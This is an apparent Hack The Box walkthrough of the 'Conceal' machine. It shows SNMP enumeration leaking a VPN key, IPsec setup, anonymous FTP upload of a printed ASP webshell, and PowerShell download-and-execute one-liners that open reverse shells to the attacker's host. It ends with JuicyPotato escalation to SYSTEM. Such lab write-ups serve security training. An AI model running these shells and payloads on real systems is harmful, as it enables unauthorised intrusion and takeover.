Conceal

Conceal is an interesting box that sets a lot of challenges. What makes it unique is how it requires a VPN in order to check for other ports VIA UDP.

Scanning and Enumeration

This particular scan was interesting, it did not return anything VIA our regular nmap scan. When running a UDP scan however we were able to note down some interesting findings.

└─$ sudo nmap -sU 10.10.10.116                                                                                   130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-12 20:48 EST
Nmap scan report for 10.10.10.116
Host is up (0.14s latency).
Not shown: 999 open|filtered ports
PORT    STATE SERVICE
500/udp open  isakmp

It appears that we have a port 500 isakmp protocol, this appears to have something to do with a key that can be used to establish a VPN connection. Information on this protocol can be found here:

Internet Security Association and Key Management ProtocolWikipedia

Knowing that this a vulnerable machine from hack the box, it is safe to assume that there is a key somewhere in this box that we can use inorder to establish a VPN connection and gain access to other ports. Rerunning the nmap scan we get the following results.

$ sudo nmap -sU -sC -sV -vv 10.10.10.116
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-12 21:00 EST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
Initiating Ping Scan at 21:00
Scanning 10.10.10.116 [4 ports]
Completed Ping Scan at 21:00, 0.14s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:00
Completed Parallel DNS resolution of 1 host. at 21:00, 0.06s elapsed
Initiating UDP Scan at 21:00
Scanning 10.10.10.116 [1000 ports]
UDP Scan Timing: About 27.55% done; ETC: 21:02 (0:01:22 remaining)
Discovered open port 500/udp on 10.10.10.116
Completed UDP Scan at 21:01, 50.63s elapsed (1000 total ports)
Initiating Service scan at 21:01
Scanning 1000 services on 10.10.10.116
Service scan Timing: About 0.40% done
Discovered open port 161/udp on 10.10.10.116
Discovered open|filtered port 161/udp on 10.10.10.116 is actually open

Looks like we have another port open, 167 which is SNMP. We can tell that this is a windows machine with the ttl 127 response, if this was another number such as 60something, we would have a linux machine. If it was something like 200 it would be a switch or some sort of networking device.

Enumerating via SNMP

Often SNMP is misconfigured, in order to enumerate via SNMP we can do so with the following command.

┌──(kali㉿kali)-[~]
└─$ snmpwalk -c public -v2c 10.10.10.116                                                 130 ⨯
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: AMD64 Family 23 Model 1 Stepping 2 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.311.1.1.3.1.1
iso.3.6.1.2.1.1.3.0 = Timeticks: (1225474) 3:24:14.74
iso.3.6.1.2.1.1.4.0 = STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"
iso.3.6.1.2.1.1.5.0 = STRING: "Conceal"
iso.3.6.1.2.1.1.6.0 = ""
iso.3.6.1.2.1.1.7.0 = INTEGER: 76
iso.3.6.1.2.1.2.1.0 = INTEGER: 15
iso.3.6.1.2.1.2.2.1.1.1 = INTEGER: 1
iso.3.6.1.2.1.2.2.1.1.2 = INTEGER: 2

Doing so gives us a VPN password hash. Lets take a crack at it at hashes.org and see if we can crack this hash.

Looks like we found a password! Dudecake1. Its safe to assume that this is the VPN Password that we will need to establish the VPN connection.

We can also enumerate using the SNMP check tool with the following command:

──(kali㉿kali)-[~]
└─$ snmp-check 10.10.10.116                                                              130 ⨯
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.10.10.116:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 10.10.10.116
  Hostname                      : Conceal
  Description                   : Hardware: AMD64 Family 23 Model 1 Stepping 2 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
  Contact                       : IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43
  Location                      : -
  Uptime snmp                   : 03:30:52.59
  Uptime system                 : 03:30:35.90
  System date                   : 2021-2-13 02:21:41.0
  Domain                        : WORKGROUP

[*] TCP connections and listening ports:

  Local address         Local port            Remote address        Remote port           State               
  0.0.0.0               21                    0.0.0.0               0                     listen              
  0.0.0.0               80                    0.0.0.0               0                     listen              
  0.0.0.0               135                   0.0.0.0               0                     listen              
  0.0.0.0               445                   0.0.0.0               0                     listen              
  0.0.0.0               49664                 0.0.0.0               0                     listen              
  0.0.0.0               49665                 0.0.0.0               0                     listen              
  0.0.0.0               49666                 0.0.0.0               0                     listen              
  0.0.0.0               49667                 0.0.0.0               0                     listen              
  0.0.0.0               49668                 0.0.0.0               0                     listen              
  0.0.0.0               49669                 0.0.0.0               0                     listen              
  0.0.0.0               49670                 0.0.0.0               0                     listen              
  10.10.10.116          139                   0.0.0.0               0                     listen              

[*] Listening UDP ports:

  Local address         Local port          
  0.0.0.0               123                 
  0.0.0.0               161                 
  0.0.0.0               500                 
  0.0.0.0               4500                
  0.0.0.0               5050                
  0.0.0.0               5353                
  0.0.0.0               5355                
  0.0.0.0               60988               
  10.10.10.116          137                 
  10.10.10.116          138                 
  10.10.10.116          1900                
  10.10.10.116          53218               
  127.0.0.1             1900                
  127.0.0.1             53219

Doing so will give us access to ports that we will not be able to access until we establish a VPN connection. Looks like we will be abusing port 500 and 4500.

Establishing VPN connection

Now that we have the VPN password, lets run ike-scan to enumerate for more valueable information that we can leverage into our VPN connection that we will create.

┌──(kali㉿kali)-[~]
└─$ sudo ike-scan 10.10.10.116 -M
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116    Main Mode Handshake returned
        HDR=(CKY-R=eb797c8fbd3ed4a2)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)
        VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8)
        VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T)
        VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n)
        VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation)
        VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable)
        VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)

Ending ike-scan 1.9.4: 1 hosts scanned in 0.124 seconds (8.04 hosts/sec).  1 returned handshake; 0 returned notify

In the SA information we get information regarding the type of encryption, hashing algorithm, group, authentication type and Lifespan. We will need this in order to configure our VPN file down the road. Quick note we can convert the life span via python:

└─$ python -c 'print int("0x00007080",16)'
28800

This is equal to 8 hours! Remeber as we will need this down the road for configuration. To configure our VPN, download the following

sudo apt install strongswan
sudo apt-get install -y libstrongswan-standard-plugins
sudo apt-get install -y libstrongswan-extra-plugins

edit the ipsec.secrets file:

┌──(kali㉿kali)-[~]
└─$ sudo cat /etc/ipsec.secrets
# This file holds shared secrets or RSA private keys for authentication.

# RSA private key for this host, authenticating it to any other host
# which knows the public part.

10.10.14.30 10.10.10.116 : PSK "Dudecake1!"

edit the vi /etc/ipsec.conf file

└─$ sudo cat /etc/ipsec.conf
# Sample VPN connections
conn Conceal
        authby=secret
        auto=route
        keyexchange=ikev1
        ike=3des-sha1-modp1024
        left=10.10.14.30
        right=10.10.10.116
        type=transport
        esp=3des-sha1
        rightprotoport=tcp
        
└─$ sudo ipsec up Conceal
initiating Main Mode IKE_SA Conceal[1] to 10.10.10.116
generating ID_PROT request 0 [ SA V V V V V ]
sending packet: from 10.10.14.30[500] to 10.10.10.116[500] (236 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.30[500] (208 bytes)
parsed ID_PROT response 0 [ SA V V V V V V ]
received MS NT5 ISAKMPOAKLEY vendor ID
received NAT-T (RFC 3947) vendor ID
received draft-ietf-ipsec-nat-t-ike-02\n vendor ID
received FRAGMENTATION vendor ID
received unknown vendor ID: fb:1d:e3:cd:f3:41:b7:ea:16:b7:e5:be:08:55:f1:20
received unknown vendor ID: e3:a5:96:6a:76:37:9f:e7:07:22:82:31:e5:ce:86:52
selected proposal: IKE:3DES_CBC/HMAC_SHA1_96/PRF_HMAC_SHA1/MODP_1024
generating ID_PROT request 0 [ KE No NAT-D NAT-D ]
sending packet: from 10.10.14.30[500] to 10.10.10.116[500] (244 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.30[500] (260 bytes)
parsed ID_PROT response 0 [ KE No NAT-D NAT-D ]
generating ID_PROT request 0 [ ID HASH N(INITIAL_CONTACT) ]
sending packet: from 10.10.14.30[500] to 10.10.10.116[500] (100 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.30[500] (68 bytes)
parsed ID_PROT response 0 [ ID HASH ]
IKE_SA Conceal[1] established between 10.10.14.30[10.10.14.30]...10.10.10.116[10.10.10.116]
scheduling reauthentication in 10123s
maximum IKE_SA lifetime 10663s
generating QUICK_MODE request 2443783256 [ HASH SA No ID ID ]
sending packet: from 10.10.14.30[500] to 10.10.10.116[500] (220 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.30[500] (188 bytes)
parsed QUICK_MODE response 2443783256 [ HASH SA No ID ID ]
selected proposal: ESP:3DES_CBC/HMAC_SHA1_96/NO_EXT_SEQ
CHILD_SA Conceal{2} established with SPIs cfea555b_i 1004a842_o and TS 10.10.14.30/32 === 10.10.10.116/32[tcp]
generating QUICK_MODE request 2443783256 [ HASH ]
connection 'Conceal' established successfully

Once the connection is established, we can check for TCP ports with the following nmap scan.

└─$ nmap -sT -p 445 10.10.10.116 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 12:35 EST
Nmap scan report for 10.10.10.116
Host is up (0.10s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

Perfect, we have an established connection. Please note, you may need to restart your Kali VM in order to make it work, it took me a while and scratching my head. For some reason, the old school turn it off and on never seems to fail.

Also note, you can not do syn scans over a vpn connection using nmap, so you will have to do a TCP scan as above. Now that we have access less run a full TCP nmap scan and enumerate the results.

└─$ nmap -sT -sC -sV -oN nmap-TCP-VPN-scan 10.10.10.116
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 12:45 EST
Nmap scan report for 10.10.10.116
Host is up (0.10s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE       VERSION
21/tcp  open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8m55s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-02-13T17:54:27
|_  start_date: 2021-02-12T22:51:05

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.09 seconds

Looks like we have FTP and a Microsoft webserver. Usually this means that it may be vulnerable to file upload exploitation if we have anonymous ftp. We could upload a shell and access this to the webserver, then we can execute some code. Spooky stuff right there. Lets check it out.

Lets check for ftp access.

└─$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>

We have access! Next lets check the webserver and see if there could be a file uploads folder somewhere in there. Usually this is something like /upload /uploads.

Uploading Our Shell

Now it is time to upload our shell. Microsoft IIS uses either asp or aspx files, lets try to check both of them out.

──(kali㉿kali)-[~/HTB/Conceal/ftp]
└─$ echo "test" > test.asp 
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/HTB/Conceal/ftp]
└─$ ftp 10.10.10.116       
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put test.asp
local: test.asp remote: test.asp
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
6 bytes sent in 0.00 secs (20.9263 kB/s)
ftp>

Looks like we can upload both, it also appears that there is a time limit in the webserver becuase it deletes files, therefore we must be snappy and quick to run our reverse shell.

Download the following to execute commands:

GitHub - tennc/webshell: This is a webshell open source projectGitHub

┌──(kali㉿kali)-[/opt/webshell/asp]
└─$ cat shell.asp  
GIF89a$       ;<hTml>
<% if request("miemie")="av" then %>
<%
on error resume next
testfile=Request.form("2010")
if Trim(request("2010"))<>"" then
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.CreateTextFile(testfile,True)
thisfile.Write(""&Request.form("1988") & "")
if err =0 Then
response.write"<font color=red>Success</font>"
else
response.write"<font color=red>False</font>"
end if
err.clear
thisfile.close
set fs = nothing
End if
%>
<style type="text/css">
<!--
#Layer1 {
    position:absolute;
    left:500px;
    top:404px;
    width:118px;
    height:13px;
    z-index:7;
}
.STYLE1 {color: #9900FF}
-->
</style>
<title>Welcome To AK Team</title>
<form method="POST" ACTION="">
<input type="text" size="54" name="2010"
value="<%=server.mappath("akt.asp")%>"> <BR>
<TEXTAREA NAME="1988" ROWS="18" COLS="78"></TEXTAREA>
<input type="submit" name="Send" value="GO!">
<div id="Layer1">- BY F4ck</div>
</form>
<% end if %>
</hTml>

shell.asp?miemie=av

We are going to upload the following asp file and execute commands.

Now keep in mind, the file is prepared to be removed ever so often, therefore we need to ensure we are ready to continue uploading - by any means necessary. Before we do so, download the following repo to gain access to our shell and copy the following into our ftp folder.

GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security.GitHub

Establishing Reverse Connection

┌──(kali㉿kali)-[/opt/nishang/Shells]
└─$ cp Invoke-PowerShellTcp.ps1 ~/HTB/Conceal/ftp 
                                                                                                           
┌──(kali㉿kali)-[/opt/nishang/Shells]
└─$ cd ~/HTB/Conceal/ftp 
                                                                                                           
┌──(kali㉿kali)-[~/HTB/Conceal/ftp]
└─$ ls
asp  Invoke-PowerShellTcp.ps1  test.asp  test.aspx  webshell.asp

Edit the file shell file by adding the following to the bottom of the script.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.30 -Port 9001

Set up a listener.

rlwrap nc -lvnp 9001

Setup HTTP server to transfer

python -m SimpleHTTPServer 1234

Transfer and execute the file by running the following command on the web browser.

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.30:1234/Invoke-PowerShellTcp.ps1')"

Post Exploitation

Now that we have access lets do some enumeration.

whoami /all
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

PS C:\Windows\SysWOW64\inetsrv> whoami : ERROR: Unable to get user claims information.
At line:1 char:1
+ whoami /all
+ ~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (ERROR: Unable t...ms information.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

Notice that SeImpersonatePrivilege is set to Enabled, this means that it is vulnerable to Juicypatato Exploit!

Releases · ohpe/juicy-potatoGitHub

Similarly, just like you downloaded the shell to the webserver, we are going to download the juicypatatoe file via HTTP and execute manually. This will be done via ftp or with the following command.

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.30:1234/jp.exe')"

Note, before doing so, lets find out where on the windows machine the file is stored. We want to do this because it is removed from the folder after a certain amount of time.

It appears to be in the following directory

PS C:\inetpub\wwwroot\upload>

So once it is downloaded, we are going to transfer it to

C:\Users\Destitute\Documents>

If that doesn't work, then we will try to upload it to another folder, but well see how that goes. The way to do this, to be efficent is with the following command after we upload the file

cp C:\inetpub\wwwroot\upload\jp.exe> .

Another way of downloading the file is by executing the following command on our web server.

(new-object net.webclient).downloadfile('http://10.10.14.7:5555/JuicyPotato.exe', 'C:\Users\Destitute\Documents\jp.exe')

It will download it from our http server and put it automatically in the set specified path. Really the choice is up to you. In this instance we will be uploading via ftp.

Once it is uploaded into the server you will see the file as follows:

PS C:\Users\Destitute\Documents> dir


    Directory: C:\Users\Destitute\Documents


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       13/02/2021     19:21         348468 jp.exe

Running the file, you will see that it does not work. The reason is because the file was not uploaded in binary mode. You can specify binary mode in ftp before upload.

PS C:\Users\Destitute\Documents> ./jp.exe


    Directory: C:\Users\Destitute\Documents


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       13/02/2021     19:21         348468 jp.exe                                                                


PS C:\Users\Destitute\Documents> Invoke-PowerShellTcp : Program 'jp.exe' failed to run: The specified executable is not a valid application for this OS 
platform.At line:1 char:1
+ ./jp.exe
+ ~~~~~~~~.
At line:127 char:1
+ Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.30 -Port 9001
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorException
    + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Invoke-PowerShellTcp

Putting FTP into binary mode

                                                                                                           
┌──(kali㉿kali)-[~/HTB/Conceal/ftp]
└─$ ftp 10.10.10.116 
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> binary
200 Type set to I.
ftp> put jp.exe

Copying jp.exe to our desired folder

PS C:\inetpub\wwwroot\upload> dir


    Directory: C:\inetpub\wwwroot\upload


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       13/02/2021     19:28         347648 jp.exe                                                                

PS C:\inetpub\wwwroot\upload> dir
PS C:\inetpub\wwwroot\upload> cp jp.exe C:\Users\Destitute\Documents

Execute

PS C:\Users\Destitute\Documents> ./jp.exe
JuicyPotato v0.1 

Mandatory args: 
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args: 
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user
PS C:\Users\Destitute\Documents>

We are going to need a few things here.

t we will set *
p a program to launch, something that will execute a reverse shell
l a listening port.

Lets create our program to launch a reverse shell back to kali, yes another reverse shell that will be executed as root. Before we create the program, lets edit ANOTHER .ps1 and change the port where we will be receiving the reverse shell.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.30 -Port 9002

This time it will be on port 9002.

Next step is to create a powershell script that will be ran by juicy patato, we will call it spooky.bat

vi spooky.bat
powershell "IEX(New-Object Net.WebClient).downloadString(http://10.10.14.30:1234/shell2.ps1')"

Upload and copy the bat file to where the jp executable is located at.

cp C:\inetpub\wwwroot\upload\spooky.bat .
    Directory: C:\Users\Destitute\Documents


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       13/02/2021     19:29         347648 jp.exe                                                                
-a----       13/02/2021     19:50             96 spooky.bat

Set up our listener

rlwrap nc -lvnp 9002

Run juicy patato with the following flags. This is going to attempt to get a token that impersonates system and then run our bat file with elevated privleges.

PS C:\Users\Destitute\Documents> ./jp.exe -t * -p spooky.bat -l 7777
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 7777
COM -> recv failed with error: 10038

We get a CLSID error in order to fix that, we have to find another CLSID, there are different ones but after obtaing through trial and error you can find a compatible one, one that is most likely to work. We looked at widows 10 enterprise ones

http://ohpe.it/juicy-potato/CLSID/ohpe.it

PS C:\Users\Destitute\Documents> ./jp.exe -t * -p spooky.bat -l 7777 -c '{e60687f7-01a1-40aa-86ac-db1cbf673334}'
Testing {e60687f7-01a1-40aa-86ac-db1cbf673334} 7777
......
[+] authresult 0
{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

On our Listener

ning on [any] 9002 ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.116] 49700
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
nt authority\system
PS C:\Windows\system32>

PreviousSense NextLa Casa de Papel

Last updated 4 years ago

hashtagScanning and Enumeration

hashtagEnumerating via SNMP

hashtagEstablishing VPN connection

hashtagUploading Our Shell

hashtagEstablishing Reverse Connection

hashtagPost Exploitation